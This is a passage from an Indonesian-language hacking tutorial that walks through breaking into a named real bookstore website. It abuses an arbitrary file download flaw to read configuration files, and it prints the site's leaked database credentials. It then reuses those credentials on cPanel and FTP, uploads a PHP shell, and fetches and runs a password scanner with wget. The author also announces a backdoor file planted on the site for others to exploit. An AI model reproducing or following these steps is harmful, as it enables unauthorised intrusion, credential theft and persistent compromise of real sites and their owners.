pada string dibelakang file "download.php" sehinga url menjadi :
www.gerakbudaya.com/store/download.php?filename=download.php
jika berhasil mendownload file "download.php" bearti bugnya vurnerable dan bisa kita manfaatkan untuk
mengambil file2 php lainnya termasuk file php untuk proses login atau file php untuk menghubungkan ke database..
Pertama2 kita cari dulu page admin/login berada, caranya dengan mengira2 lokasi path adminnya (misal: /admin, /administrator, /login, /admin.php, /login.php, dst) atau bisa dengan "cgiscan"
Nah pada target ini saya menemukan pagenya di www.gerakbudaya.com/store/login.php (koq bisa nebak??
hehe kan udah ada linknya tinggal klik aja..;p) kalo login berupa form cari actionnya mengarah kemana
caranya mudah saja lihat source code dan cari kata2 action="", untuk target saya dapatkan diantara
script:
method="get">
Langkah selanjutnya download file "login.php" dengan memasukkan string pada bugs, sehingga url menjadi:
www.gerakbudaya.com/store/download.php?filename=login.php kemudian buka file "login.php" dengan notepad, cari
file prosesnya mengarah kemana..cari link file proses loginnya diantara kata2 includes atau required sebelum kata2 procces, untuk target saya dapatkan diantara script:
require('includes/application_top.php') --> artinya mengarah ke "/includes/application_top.php"
Download lagi file "/includes/application_top.php" dengan memasukkan string pada bugs, sehingga url
menjadi:
www.gerakbudaya.com/store/download.php?filename=includes/application_top.php
buka lagi file "aplication_top.php" dan cari lagi kata2 includes atau required, pada target saya
dapatkan :// include server parameters require('includes/configure.php');
---> artinya diproses oleh file "includes/configure.php"
Download file "includes/configure.php" tersebut dgn memasukkan string pada bugs, sehingga url menjadi:
www.gerakbudaya.com/store/download.php?filename=includes/configure.php
buka file tsb dan kita akan menemukan username database, password, dan database name. Pada target
saya temukan diantara script:
define('DB_SERVER_USERNAME', 'gerakbdy_geraksi');
define('DB_SERVER_PASSWORD', '79578342');
define('DB_DATABASE', 'gerakbdy_mainstore');
artinya:
database name=geraksi
database password=79578342
database username=gerakbdy_mainstore
username cpanel=gerakbdy
*catatan:username dan password digunakan pada database phpmyadmin bukan pada admin user dan admin
cpanel. okkk sampe sini istirahat dulu bentar, kalo udah lanjut lagi:
Control panel admin webmaster setahu saya ada dua jenis yaitu cpanel atau spanel, untuk login tinggal
menambah path /cpanel atau /spanel dibelakan domain..
untuk cpanel, login phpmyadmin terpadu didala cpanel sehingga kita masih harus login terlebih dahulu pada cpanel. Sedangkan pada spanel login filemanager dan phpmyadmin dipisahkan, sehingga kita bisa langsung masuk ke database phpmyadmin dgn
password dan username tadi tanpa harus login dulu ke panel admin..
Setelah saya mengecek whois domain, ternyata target menggunakan host civicbuilder.net yg menggunakan
cpanel11, skrg coba kita login ke cpanel-nya pada url:
www.gerakbudaya.com/cpanel ----> masukkan username
gerakbdy dan password kita coba dgn password database atau username database atau kata2 lain yg
kita dapatkan!!
*jika berhasil kita langsung dapat login ke filemanager
Kenapa pada password kita menggunakan pass db atau usrnm db, jawabannya simple karena psikologisnya,
admin webmaster biasanya tidak mau repot mengahapal sekian banyak password cpanel, database, webmail,
ftp, dl . Kalo belum berhasil login ke cpanel jgn gampang menyerah, kita coba dengan ftp, siapa tau kita bisa
masuk. Dengan cara berikut:
untuk tutorial ini penulis menggunakan mscmd pada
windows :
- buka cmd prompt ---> klik start->run->ketik "cmd"
- pada cmd prompt ketik "ftp gerakbudaya.com"
- kita akan ditanyakan username dan password, coba
masukkan pass dan usrnm db, siapa tau beruntung? Dan ternyata anda benar " i'm login succesfully"
wuihhhhh..akhirnya
so selanjutnya apa?? yupz kita bisa langsung mengupload, mendownload, atau menghapus file, dll
perintah command ftp bisa kalian lihat di http://www.nsftools.com/tips/MSFTP.htm
Tapi gk seru ya kayaknya kalo gk dapet akses penuh ke cpanel..tenang ada caranya:
coba kita upload sebuah shell ke dalam server melaui ftp..
setalah berhasil buka file shell-nya dan set konfigurasi kalo udah login ke phpshell..masukkan file untuk scan password target (cari di google atau buat sendirilah...usaha yaaa),
caranya dengan perintah command linux:
"wget http://www.geocities.com/budak_dak_berez/scanpass.txt"
---> tanpa tanda kutip
kemudian rename file menjadi .php, caranya: ketik "mv scanpass.txt scanpass.php" ---> tanpa tanda kutip
ok sekarang coba jalankan file tersebut, dgn mengetikkan: "php scanpass.php" ---> tanpa tanda kutip
script akan scan semua user path yang memiliki config.php pada /home/ bukan /public_html/ atau wwwroot
gotchaaa...saya menemukan usrnm gerakbdy dengan pass 79578342
catatan: ini pun masih membutuhkan sebuah keberuntungan dengan shell ini saya pun berhasil mempertahankan
cpanel yg sempat diambil alih..namun setelah phpshel dan account ftp dihapus oleh webmaster saya hanya bisa gigit jari...;p
buat rekan yg lain yg mungkin bisa memanfaatkan dan mengembangkan celah ini..saya menanamkan sebuah bugs fungsi get file dgn url "www.gerakbudaya.com/bahaya.php?filename=" pass dan usrnm db telah diganti admin webmaster
menjadi:
username db: gerakbdy_geramm / geramm
password db:
Ok frenz lanjutkan perjuangan saya, karena saya mohon pamit dulu untuk mundur, segala yg mengatasnamakan budak^dak^berez pada aksi hacking, defacing, dll bukanlah saya yg melakukannya..
catatan terakhir: saya sangat sedih karena bugs ini banyak saya temukan pada situs2 indonesia, tolong di secure!!
Mohon maaf yg sebesar2nya jikalau ada kesalahan dan kekurangan pada tutorial ini, karena saya hanyalah manusia biasa
Wassallam wm wb..MERDEKAAAAAAAA!!!
Ingin belajar hacking silakan download ini
http://rapidshare.com/files/75661607/UltimateHacking2007.rar